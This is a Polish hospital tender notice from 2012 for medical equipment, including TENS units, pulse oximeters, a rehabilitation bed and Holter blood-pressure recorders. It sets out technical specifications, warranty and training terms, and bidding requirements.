Przedmiotem zamówienia jest dostawa tensów do łagodzenia przewlekłych bólów  - 4 kpl., montaż, instalacja, uruchomienie (rozruch) i przeszkolenie personelu Zamawiającego w zakresie jego obsługi i eksploatacji.
Kod CPV -33158210-7 
Producent 
Typ urządzenia Kraj pochodzenia 
Rok produkcji 2012
V.	OPIS PRZEDMIOTU ZAMÓWIENIA - ZESTAWIENIE PARAMETRÓW TECHNICZNYCH
L.P.	FUNKCJA/PARAMETR	WARUNEK GRANICZNY	

J.M.	
PARAMETRY 
OFEROWANE
I.	Tens do łagodzenia przewlekłych bólów	TAK	4 kpl.	
1	Zaprogramowane gotowe programy terapeutyczne	TAK		
2	Liczba kanałów minimum 2	TAK		
3	Maksymalna stymulacja impuls 0-60 mA	TAK		
4	Zakres częstotliwość impulsów minimum 2-150 impulsów s (pps)	TAK
		
5	Czas trwania impulsu minimum 0-400 mikrosekund przy 50 % amplitudy piku, regulowany	TAK
		
6	Długość impulsu minimum 60-400 mikrosekund	TAK		
7	Maksymalna ilość ładunków elektrycznych impuls 30 C	TAK		
8	Wyświetlacz pokazuje minimum: liczbę sesji, średni czas trwania sesji, całkowitą liczbę godzin użytkowania, średnią intensywność dla kanału 1 i kanału 2	TAK		
9	Akumulatorowe lub bateryjne	TAK
		
10	Wymiary maksimum 110x61x35 mm	TAK
		
11	Waga maksimum 140 g	TAK
		
II	Inne	TAK		
1	Oświadczenie, potwierdzające dopuszczenie do używania na terenie RP zgodnie z Ustawą o Wyrobach Medycznych	TAK		
2	Dołączyć folder wraz z opisem do oferty	TAK		
3	Instrukcja obsługi i opis techniczny w języku polskim - przy dostawie sprzętu	TAK		

               II.   OPIS PRZEDMIOTU ZAMÓWIENIA -ZESTAWIENIE WARUNKÓW GRANICZNYCH GWARANCJI 
L.p.	
PARAMETR	WARUNEK GRANICZNY	WARUNEK OFEROWANY
M.	OKRES GWARANCJI		
21.		Okres pełnej bezpłatnej gwarancji  [miesiące]	min. 24 miesiące 	PODAĆ  ILE
22.		Czas reakcji na zgłoszoną awarię [godz.]	        max 48 godzin	PODAĆ  ILE
23.		Każda naprawa gwarancyjna powoduje przedłużenie okresu gwarancji o czas naprawy 	TAK	
24.		Liczba bezpłatnych przeglądów w czasie gwarancji 	zgodnie z zaleceniami producenta	PODAĆ  ILE
25.		Koszt transportu uszkodzonego elementu urządzenia lub urządzenia podlegającego naprawie lub wymianie do i z punktu serwisowego pokrywa Wykonawca	TAK	
	
N.	SERWIS POGWARANCYJNY	
13.		Okres zagwarantowania dostępności części zamiennych oraz materiałów zużywalnych od daty podpisania protokołu odbioru technicznego [w latach ].	min. 10 lat	PODAĆ  ILE
14.		Okres gwarancji dla nowo zainstalowanych elementów po naprawie	min.6 miesięcy	PODAĆ  ILE
15.		Inne		PODAĆ  JEŚLI  WYSTĘPUJĄ
O.	SZKOLENIA	
13.		Personel medyczny w zakresie obsługi i eksploatacji sprzętu w ramach zakupu sprzętu:
- przy uruchomieniu zestawu
-odświeżające bezpośrednio w ramach przeglądu okresowego oraz  
 przed ukończeniem okresu gwarancji 	TAK	
14.		Personel techniczny w zakresie obsługi i eksploatacji w ramach zakupu sprzętu	TAK	
15.		Inne 		PODAĆ  JEŚLI  WYSTĘPUJĄ

Pakiet nr 6 
Przedmiotem zamówienia jest dostawa pulsoksymetru  - 2 kpl., montaż, instalacja, uruchomienie (rozruch) i przeszkolenie personelu Zamawiającego w zakresie jego obsługi i eksploatacji.
Kod CPV -33120000-7 
Producent Typ urządzenia Kraj pochodzenia Rok produkcji 2012
VI.	OPIS PRZEDMIOTU ZAMÓWIENIA - ZESTAWIENIE PARAMETRÓW TECHNICZNYCH
L.P.	FUNKCJA/PARAMETR	WARUNEK GRANICZNY	

J.M.	
PARAMETRY 
OFEROWANE
I.	Pulsoksymetr przenośny	TAK	2 kpl.	
1	Wyrywkowe sprawdzanie pulsu w trybie ciągłego monitoringu	TAK		
2	Synchronizacja z PC oparte Sofrware (WinXP )	TAK		
3	Wyświetlacz minimum 1, 8 cala kolorowy TFT	TAK
		
4	Rozdzielczość minimum 160x96	TAK
		
5	Tryb wyświetlania-wyświetlacz kierunek regulowany	TAK		
6	Wskaźniki: zasilania, sygnał dźwiękowy, dźwięk pulsu	TAK		
7	Interfejs: gniazdo do podłączenia czujników SpO2, gniazdo do kabli komunikacyjnych	TAK		
8	Zasilanie bateryjne	TAK
		
9	Nagrywanie: dane mogą być zapisywane do min 24 godzin	TAK
		
10	Waga maksimum 136 g ( z baterią)	TAK
		
11	Zakres pomiaru 0-100%	TAK
		
12	Dokładność  + - 2% ( 70%-100%)	TAK		
13	Zakres alarmu 0%-100%	TAK		
14	Odświeżanie 1s	TAK
		
15	Zakres pomiaru pulsu 25-250 bpm	TAK
		
16	Rozdzielczość 1 bpm	TAK		
17	Dokładność + - 3 bpm (bez ruchu)	TAK		
18	Zakres alarmu 25-250 bpm	TAK		
19	Odświeżanie 1 s	TAK		
II	Inne	TAK		
1	Oświadczenie, potwierdzające dopuszczenie do używania na terenie RP zgodnie z Ustawą o Wyrobach Medycznych	TAK		
2	Dołączyć folder wraz z opisem do oferty	TAK		
3	Instrukcja obsługi i opis techniczny w języku polskim - przy dostawie sprzętu	TAK		

               II.   OPIS PRZEDMIOTU ZAMÓWIENIA -ZESTAWIENIE WARUNKÓW GRANICZNYCH GWARANCJI 
L.p.	
PARAMETR	WARUNEK GRANICZNY	WARUNEK OFEROWANY
P.	OKRES GWARANCJI		
26.		Okres pełnej bezpłatnej gwarancji  [miesiące]	min. 24 miesiące 	PODAĆ  ILE
27.		Czas reakcji na zgłoszoną awarię [godz.]	       max 48 godzin	PODAĆ  ILE
28.		Każda naprawa gwarancyjna powoduje przedłużenie okresu gwarancji o czas naprawy 	TAK	
29.		Liczba bezpłatnych przeglądów w czasie gwarancji 	zgodnie z zaleceniami producenta	PODAĆ  ILE
30.		Koszt transportu uszkodzonego elementu urządzenia lub urządzenia podlegającego naprawie lub wymianie do i z punktu serwisowego pokrywa Wykonawca	TAK	
	
Q.	SERWIS POGWARANCYJNY	
16.		Okres zagwarantowania dostępności części zamiennych oraz materiałów zużywalnych od daty podpisania protokołu odbioru technicznego [w latach ].	min. 10 lat	PODAĆ  ILE
17.		Okres gwarancji dla nowo zainstalowanych elementów po naprawie	min.6 miesięcy	PODAĆ  ILE
18.		Inne		PODAĆ  JEŚLI  WYSTĘPUJĄ
R.	SZKOLENIA	
16.		Personel medyczny w zakresie obsługi i eksploatacji sprzętu w ramach zakupu sprzętu:
- przy uruchomieniu zestawu
-odświeżające bezpośrednio w ramach przeglądu okresowego oraz  
 przed ukończeniem okresu gwarancji 	TAK	
17.		Personel techniczny w zakresie obsługi i eksploatacji  w ramach zakupu sprzętu	TAK	
18.		Inne 		PODAĆ  JEŚLI  WYSTĘPUJĄ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.19.21.20-9, 33.12.00.00-7, 33.12.00.00-0, 33.19.00.00-8, 33.15.82.10-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 42.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowo sposobu dokonywania oceny spełnienia warunku udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowo sposobu dokonywania oceny spełnienia warunku udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowo sposobu dokonywania oceny spełnienia warunku udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowo sposobu dokonywania oceny spełnienia warunku udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowo sposobu dokonywania oceny spełnienia warunku udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wypełniony FORMULARZ OFERTOWY - według ZAŁĄCZNIKA NR 2 do SIWZ.
2. Wypełniony we wskazanych miejscach - FORMULARZ CENOWY - OPIS PRZEDMIOTU ZAMÓWIENIA - według ZAŁĄCZNIKA NR 1 do SIWZ.
3. Pełnomocnictwo umocowujące przynajmniej w zakresie podpisania oferty w postępowaniu 
o udzielenie zamówienia publicznego, dołączone do oferty, o ile nie wynika z innych dokumentów, załączonych przez Wykonawcę. 
4. Oświadczenie Wykonawcy w trybie art. 44 ustawy, dotyczące spełnienia warunków udziału w postępowaniu, zgodnie z art. 22 ustawy, ściśle według formularza stanowiącego ZAŁĄCZNIK NR 3 do SIWZ.
5. Pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia - o ile dotyczy wykonawcy.
6. Aktualnego odpisu z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt. 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust 1 pkt 2 ustawy.
7.	Folder z opisem przedmiotu zamówienia(pakiety od  1-6)
8. Wykonawca mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt  6 składa odpowiedni dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości - dokument wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
9 . Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 8, zastępuje się je dokumentem zawierającym oświadczenie Wykonawcy złożone przed notariuszem, właściwym organem sądowym, administracyjnym, albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania - w zakresie dat wystawienia dokumentów, przepisy punktu 8 stosuje się odpowiednio.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Kupujący przewiduje możliwość zmiany umowy w stosunku do treści oferty na podstawie, której dokonano wyboru Sprzedający, jeżeli konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy lub zmiany te są korzystne dla Kupującego, a także dotyczą: 
zmiany świadczenia Sprzedającego na świadczenie lepszej jakości przy zachowaniu tożsamości towaru,
wydłużenia terminu wykonania umowy z powodu okoliczności niezależnych od Sprzedającego,
zmiany danych Sprzedającego ( np. zmiana siedziby, adresu, nazwy),
zmian organizacyjnych Zamawiającego powodujących, iż wykonanie zamówienia lub jego części staje się bezprzedmiotowe
zmian w zakresie sposobu wykonywania zadań lub zasad funkcjonowania Zamawiającego powodujących iż wykonanie zamówienia lub jego części staje się bezprzedmiotowe lub zaistniała konieczność modyfikacji przedmiotu zamówienia
omyłek pisarskich lub błędów rachunkowych,
mających na celu wyjaśnienie wątpliwości treści umowy, jeśli będzie ona budziła wątpliwości interpretacyjne między stronami,
jeżeli zmiany umowy, w tym zmiany sposobu płatności, wymagać będzie ochrona interesu Zamawiającego
 innych zmian korzystnych dla Zamawiającego, w tym polegających na zamianie elementów zamówienia na elementy o lepszych lub/i odpowiedniejszych parametrach technicznych chociażby wiązało się to z koniecznością zmiany terminu lub sposobu wykonania zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.5wszk.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 5 Wojskowy Szpital Kliniczny z Polikliniką - Samodzielny Publiczny Zakład Opieki Zdrowotnej 30 - 901 Kraków, ul. Wrocławska 1-3.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.04.2012 godzina 11:00, miejsce: Kancelaria Szpitala, (budynek komendy), ul. Wrocławska 1-3, 30 - 901 Kraków.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 1
Przedmiotem zamówienia jest dostawa łóżka rehabilitacyjnego  - 1 kpl., montaż, instalacja, uruchomienie (rozruch) i przeszkolenie personelu Zamawiającego w zakresie jego obsługi i eksploatacji.
Kod CPV -33192120-9 
Producent Typ urządzenia Kraj pochodzenia Rok produkcji 2012
I.	OPIS PRZEDMIOTU ZAMÓWIENIA - ZESTAWIENIE PARAMETRÓW TECHNICZNYCH
L.P.	FUNKCJA/PARAMETR	WARUNEK GRANICZNY	

J.M.	
PARAMETRY 
OFEROWANE
I.	Łóżko rehabilitacyjne	TAK	1 kpl.	
1	Zasilanie 230 V, 50 Hz z sygnalizacją włączenia do sieci w celu uniknięcia nieświadomego wyrwania kabla z gniazdka i uszkodzenia łóżka lub gniazdka	TAK		
2	Wbudowany akumulator do zasilania podczas transportu lub w sytuacjach zaniku prądu	TAK		
3	Długość zewnętrzna łóżka -  2250 mm (50mm) z możliwością przedłużania 	TAK
podać		
4	Szerokość zewnętrzna łóżka 1030 mm (50mm) 	TAK
podać		
5	Leże łóżka  4 - sekcyjne o  nowoczesnej konstrukcji opartej na trzech kolumnach cylindrycznych.	TAK		
6	Szczyty  tworzywowe jednoczęściowe bez elementów metalowych wyjmowane od strony nóg i głowy z możliwością zablokowania   na czas transportu przed przypadkowym wyjęciem	TAK		
7	Sterowanie elektryczne przy pomocy :
   -  panelu sterowniczego montowanego na         
      szczycie od strony nóg z możliwością  
      swobodnego wyjmowania i umieszczania na 
      szczycie czy też półce na pościel
-	pilota przewodowego 
-	paneli nożnych do sterowania przechyłami bocznymi z obu stron łóżka	TAK		
8	Regulacja elektryczna wysokości leża, mierzona od podłoża do górnej powierzchni leża w zakresie 380 mm do 760 mm ( 50 mm)	TAK
podać		
9	Możliwość uzyskania minimalnej wysokości krawędzi leża dla opuszczającego łóżko pacjenta poniżej 380 mm dzięki funkcji przechyłów bocznych	TAK
podać		
10	Regulacja elektryczna części plecowej w zakresie  75  5	TAK
podać		
11	Regulacja elektryczna części nożnej w zakresie 50  5	TAK
podać		
12	Regulacja elektryczna funkcji autokontur sterowana jednym przyciskiem przy pomocy pilota i panelu sterowniczego montowanego na szczycie łóżka od strony nóg	TAK		
13	Funkcja autoregresji zmniejszająca ryzyko powstawania odleżyn 	TAK		
14	Regulacja elektryczna pozycji Trendelenburga 20  4 - sterowanie z panelu sterowniczego montowanego na szczycie łóżka od strony nóg	TAK
podać		
15	Regulacja elektryczna pozycji anty-Trendelenburga  20  4 - sterowanie z panelu sterowniczego montowanego na szczycie łóżka od strony nóg	TAK
podać		
16	Regulacja elektryczna przechyłów bocznych z panelu sterowniczego oraz przycisków nożnych po obu stronach łóżka	TAK		
17	Pełna regulacja przechyłów bocznych w najniższym położeniu leża w celu ułatwienia opuszczania łóżka przez pacjenta min. 15 stopni	TAK		
18	Przyciski sterowania nożnego zabezpieczone przyciskiem nożnym świadomego uruchomienia regulacji	TAK		
19	Regulacja elektryczna do pozycji krzesła kardiologicznego - sterowanie przy pomocy jednego oznaczonego odpowiednim piktogramem przycisku na panelu sterowniczym montowanym na szczycie łóżka od strony nóg	TAK		
20	Elektryczna funkcja CPR (co najmniej podwójną prędkością w stosunku do innych regulacji) pozycji ratującej życie - do reanimacji - sterowana przy pomocy jednego przycisku oznaczonego odpowiednim piktogramem na panelu sterowniczym montowanym na szczycie łóżka od strony nóg	TAK		
21	Elektryczna, natychmiastowa pozycja egzaminacyjna-sterowana przy pomocy jednego przycisku oznaczonego odpowiednim piktogramem na panelu sterowniczym montowanym na szczycie łóżka od strony nóg	TAK		
22	Wyłączniki/blokady  funkcji elektrycznych (na panelu sterowniczym) dla poszczególnych regulacji:
- regulacji wysokości
- regulacji części plecowej 
- regulacji części nożnej 
- regulacji pozycji Trendelenburga i 
  anty-Trendelenburga 
-regulacji przechyłów bocznych
-sterowań nożnych	TAK		
23	Zabezpieczenie przed nieświadomym uruchomieniem funkcji poprzez konieczność wciśnięcia przyciska uruchamiającego dostępność funkcji  . Przycisk świadomego uruchomienia systemu elektrycznego łóżka znajdujący się w każdym możliwym sterowaniu: panelu, pilocie oraz sterowniku nożnym dla personelu.	TAK		
24	Zabezpieczenie przed nieświadomym uruchomieniem sterowania nożnego poprzez konieczność świadomego podniesienia osłony chroniącej.	TAK		
25	Odłączenie wszelkich regulacji z pilota, sterowań nożnych i panelu po 180 sekundach nieużywania regulacji 	TAK		
26	Przycisk bezpieczeństwa (oznaczony charakterystycznie: STOP lub tez o innym oznaczeniu) natychmiastowe odłączenie wszystkich funkcji elektrycznych umieszczony na panelu sterowniczym.	TAK		
27	Elektryczna i mechaniczna funkcja CPR	TAK		
28	Koła z systemem sterowania jazdy na wprost i boki z centralnym systemem hamulcowym. 	TAK		
29	Pojedyncze koła jezdne o średnicy 150mm gwarantujące doskonałą mobilność łóżka	TAK		
30	Bezpieczne obciążenie robocze na poziomie minimum 180kg. Pozwalające na wszystkie możliwe regulacje przy tym obciążeniu bez narażenia bezpieczeństwa pacjenta i powstanie incydentu medycznego	TAK		
31	4 kółka odbojowe chroniące przed uszkodzeniami	TAK		
32	Wyposażenie:
-	Barierki boczne jednoczęściowe składane 1 kpl
-	materac nie przepuszczającym płynów infuzyjnych a przepuszczającym 
    powietrze 1szt.
-	uchwyt na worki do moczu po każdej stronie łóżka 4 szt. 
-	półka na pościel
-	podwójna rama ortopedyczna kompatybilna z posiadanymi przez Zamawiającego łóżkami firmy Linet typ Eleganza Standard z roku 2010 2 kpl
-	dodatkowy pilot przewodowy 1 szt.	TAK		
II	Inne	TAK		
1	Oświadczenie, potwierdzające dopuszczenie do używania na terenie RP zgodnie z Ustawą o Wyrobach Medycznych	TAK		
2	Dołączyć folder wraz z opisem	TAK		
3	Instrukcja obsługi i opis techniczny w języku polskim - przy dostawie sprzętu	TAK		

               II.   OPIS PRZEDMIOTU ZAMÓWIENIA -ZESTAWIENIE WARUNKÓW GRANICZNYCH GWARANCJI 
L.p.	
PARAMETR	WARUNEK GRANICZNY	WARUNEK OFEROWANY
A.	OKRES GWARANCJI		
1.		Okres pełnej bezpłatnej gwarancji  [miesiące]	min. 24 miesiące 	PODAĆ  ILE
2.		Czas reakcji na zgłoszoną awarię [godz.]	       max 48 godzin	PODAĆ  ILE
3.		Każda naprawa gwarancyjna powoduje przedłużenie okresu gwarancji o czas naprawy 	TAK	
4.		Liczba bezpłatnych przeglądów w czasie gwarancji 	zgodnie z zaleceniami producenta	PODAĆ  ILE
5.		Koszt transportu uszkodzonego elementu urządzenia lub urządzenia podlegającego naprawie lub wymianie do i z punktu serwisowego pokrywa Wykonawca	TAK	
	
B.	SERWIS POGWARANCYJNY	
1.		Okres zagwarantowania dostępności części zamiennych oraz materiałów zużywalnych od daty podpisania protokołu odbioru technicznego [w latach ].	min. 10 lat	PODAĆ  ILE
2.		Okres gwarancji dla nowo zainstalowanych elementów po naprawie	min.6 miesięcy	PODAĆ  ILE
3.		Inne		PODAĆ  JEŚLI  WYSTĘPUJĄ
C.	SZKOLENIA	
1.		Personel medyczny w zakresie obsługi i eksploatacji sprzętu w ramach zakupu sprzętu:
- przy uruchomieniu zestawu
-odświeżające bezpośrednio w ramach przeglądu okresowego oraz  
 przed ukończeniem okresu gwarancji 	TAK	
2.		Personel techniczny w zakresie obsługi, eksploatacji oraz przeglądów pogwarancyjnych zgodnie z zaleceniami Producenta  potwierdzone certyfikatem w ramach zakupu sprzętu	TAK	
3.		Inne 		PODAĆ  JEŚLI  WYSTĘPUJĄ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.21.20-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 42.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 2 
Przedmiotem zamówienia jest dostawa rejestratora ciśnienia tętniczego metodą Holtera  - 2 kpl., montaż, instalacja, uruchomienie (rozruch) i przeszkolenie personelu Zamawiającego w zakresie jego obsługi i eksploatacji.
Kod CPV -33120000-7 
Producent 
Typ urządzenia Kraj pochodzenia Rok produkcji 2012
II.	OPIS PRZEDMIOTU ZAMÓWIENIA - ZESTAWIENIE PARAMETRÓW TECHNICZNYCH
L.P.	FUNKCJA PARAMETR	WARUNEK GRANICZNY	

J.M.	
PARAMETRY 
OFEROWANE
I	Rejestrator ciśnienia tętniczego metodą Holtera	TAK	2 kpl	
1	Rejestrator fabrycznie nowy	TAK		
2	Pomiar ciśnienia metodą oscylometryczną	TAK		
3	Programowanie min. 3 okresów pomiarowych 
z poziomu dedykowanego oprogramowania	TAK		
4	Programowanie częstości pomiarów dla każdego okresu z poziomu dedykowanego oprogramowania	TAK		
5	Możliwość wykonania do 250 pomiarów	TAK		
6	Zakres pomiarów ciśnienia: 25 260mmHg	TAK		
7	Dokładność:  3mmHg	TAK		
8	Zakres pomiaru tętna: 40 200bpm	TAK		
9	2 rozmiary wielorazowych mankietów 
w zestawie z rejestratorem	TAK		
10	Mankiety wyposażone w elastyczne rękawy zapobiegające zsuwaniu się z ramienia pacjenta 	TAK		
11	Przycisk do ręcznego wykonania pomiaru poza zaprogramowanym harmonogramem	TAK		
12	Wbudowany wyświetlacz LCD z możliwością prezentacji wykonanego pomiaru ciśnienia i ikony dzień/noc	TAK		
13	Prezentacja wartości napięcia źródła zasilania rejestratora przy jego uruchomieniu	TAK		
14	Wymiary rejestratora: 	Podać		
15	Waga rejestratora:	Podać		
16	Zasilanie rejestratora bateryjne	TAK		
17	Możliwość zastosowania akumulatorów	TAK		
18	Możliwość analizy zapisu z rejestratora na posiadanej przez Zamawiającego starszej wersji oprogramowania systemu Holterowskiego Cardioscan 12 z roku 2005 firmy Oxford 	TAK		
19	Rekomendacja Europejskiego Towarzystwa Nadciśnienia Tętniczego	TAK		
II	OPROGRAMOWANIE	TAK		
1	Oprogramowanie w języku polskim	TAK		
2	Komunikacja z rejestratorem poprzez interface podłączany w komputerze do portu USB typ A	TAK		
3	Wbudowana baza danych pacjentów	TAK		
4	Wyświetlanie w formie tabelarycznej wszystkich wykonanych pomiarów z zaznaczeniem pomiarów wykonanych na żądanie	TAK		
5	Możliwość ręcznego wpisania komentarza do każdego pomiaru lub wybrania z listy proponowanych komentarzy	TAK		
6	Informacja o błędnym pomiarze	TAK		
7	Możliwość usuwania pomiarów z analizy	TAK		
8	Prezentacja wyników pomiarów ciśnienia częstości rytmu w formie graficznej (2 typy wykresów)	TAK		
9	Możliwość porównania 2 badań tego samego pacjenta	TAK		
10	Możliwość ręcznej edycji progów ciśnienia dla wykonanego badania	TAK		
11	Możliwość automatycznego ustawienia progów ciśnienia wg norm JNC7 AHA i ESH	TAK		
12	Możliwość rekonfiguracji okresów badania (zakresów czasowych) dla wykonanego badania	TAK		
13	Wbudowany kalkulator progów pediatrycznych	TAK		
14	Możliwość edycji danych pacjenta	TAK		
15	Możliwość wpisania (i edycji) przez lekarza wywiadu, aktualnego leczenia z podaniem leków, ich dawki i częstotliwości podawania, opisu	TAK		
16	Prezentacja wyników statystycznych badania:
- ciśnienie skurczowe
- ciśnienie rozkurczowe
- częstość rytmu
- MAP
- PP
- ładunek BP
- DIP podczas snu
z podziałem na okresy i łącznie dla całego badania	TAK		
17	Prezentacja średnich godzinowych w formie tabelarycznej wartości: ciśnienia skurczowego, rozkurczowego, częstości rytmu, MAP, PP, PRP/1000	TAK		
